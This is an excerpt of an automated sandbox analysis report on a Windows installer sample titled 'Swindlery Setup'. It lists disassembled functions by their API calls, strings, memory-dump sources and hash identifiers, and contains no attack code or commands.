                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a9cb70b00609610c9cca6f4380fd1e18b8a5d323992726cc20c86ef30203be9c
                          • Instruction ID: f47cbf795ca4a3d69f538e4be7b2a99fc2d626584dbd2fed0361fe359b0b9102
                          • Opcode Fuzzy Hash: a9cb70b00609610c9cca6f4380fd1e18b8a5d323992726cc20c86ef30203be9c
                          • Instruction Fuzzy Hash: F0B12871E04219DBCF18CF68D4905EEBBB2BF98314F25826AC85677384D734AA42CF95
                          Function 00404D32 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                          • GetDlgItem.USER32(?,00000408), ref: 00404D56
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                          • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                          • DeleteObject.GDI32(00000110), ref: 00404E33
                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                            • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                          • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                          • ShowWindow.USER32(?,00000005), ref: 00404F94
                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                          • ImageList_Destroy.COMCTL32(?), ref: 00405162
                          • GlobalFree.KERNEL32(?), ref: 00405172
                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                          • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                          • ShowWindow.USER32(?,00000000), ref: 0040531C
                          • GetDlgItem.USER32(?,000003FE), ref: 00405327
                          • ShowWindow.USER32(00000000), ref: 0040532E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 2564846305-813528018
                          • Opcode ID: c8e1d04b8d39ebbf2dcd292838eac2719ba6188869ab5a5976a4ec129dc76671
                          • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                          • Opcode Fuzzy Hash: c8e1d04b8d39ebbf2dcd292838eac2719ba6188869ab5a5976a4ec129dc76671
                          • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                          Function 00404498 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                          • GetSysColor.USER32(?), ref: 00404566
                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                          • lstrlenA.KERNEL32(?), ref: 00404587
                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                          • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                          • SendMessageA.USER32(00000000), ref: 00404610
                          • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                          • SetCursor.USER32(00000000), ref: 00404693
                          • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                          • SetCursor.USER32(00000000), ref: 004046AC
                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                          • String ID: N$Remove folder: $cD@
                          • API String ID: 3103080414-2623635553
                          • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                          • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                          • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                          • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,Swindlery Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$Swindlery Setup
                          • API String ID: 941294808-656777584
                          • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                          • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                          • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                          • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                          Function 00405EF6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                          • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                            • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                            • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                          • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                          • wsprintfA.USER32 ref: 00405F6B
                          • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                          • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                          • GlobalFree.KERNEL32(00000000), ref: 00406054
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                            • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                            • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                          • String ID: %s=%s$[Rename]
                          • API String ID: 2171350718-1727408572
                          • Opcode ID: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                          • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                          • Opcode Fuzzy Hash: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                          • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                          Function 00406587 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                          • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                          • CharNextA.USER32(0000000C,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                          • CharPrevA.USER32(0000000C,0000000C,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                          Strings
                          • *?|<>/":, xrefs: 004065CF
                          • "C:\Users\user\Desktop\vfhlZ0vrbe.exe", xrefs: 00406587
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-2212154593
                          • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                          • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                          • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                          • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                          Function 00404394 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                          • GetSysColor.USER32(00000000), ref: 004043EF
                          • SetTextColor.GDI32(?,00000000), ref: 004043FB
                          • SetBkMode.GDI32(?,?), ref: 00404407
                          • GetSysColor.USER32(?), ref: 0040441A
                          • SetBkColor.GDI32(?,?), ref: 0040442A
                          • DeleteObject.GDI32(?), ref: 00404444
                          • CreateBrushIndirect.GDI32(?), ref: 0040444E
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                          • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                          • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                          • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                          Function 00404C80 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                          • GetMessagePos.USER32 ref: 00404CA3
                          • ScreenToClient.USER32(?,?), ref: 00404CBD
                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                          • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                          • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                          • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                          Function 00401E5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(?), ref: 00401E5D
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                          • ReleaseDC.USER32(?,00000000), ref: 00401E90
                          • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID: Times New Roman
                          • API String ID: 3808545654-927190056
                          • Opcode ID: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                          • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                          • Opcode Fuzzy Hash: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                          • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                          Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                          Download Yara Rule
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                          • MulDiv.KERNEL32(0014CD37,00000064,0014D888), ref: 00402E90
                          • wsprintfA.USER32 ref: 00402EA0
                          • SetWindowTextA.USER32(?,?), ref: 00402EB0
                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                          Strings
                          • verifying installer: %d%%, xrefs: 00402E9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                          • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                          • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                          • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                          Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                          • GlobalFree.KERNEL32(?), ref: 004028C9
                          • GlobalFree.KERNEL32(00000000), ref: 004028DC
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                          • String ID:
                          • API String ID: 2667972263-0
                          • Opcode ID: f9d8bf5d5987790022c70f7326850f96b9b02ebc48a317f88317c3e1387ee75d
                          • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                          • Opcode Fuzzy Hash: f9d8bf5d5987790022c70f7326850f96b9b02ebc48a317f88317c3e1387ee75d
                          • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                          Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                          Memory Dump Source
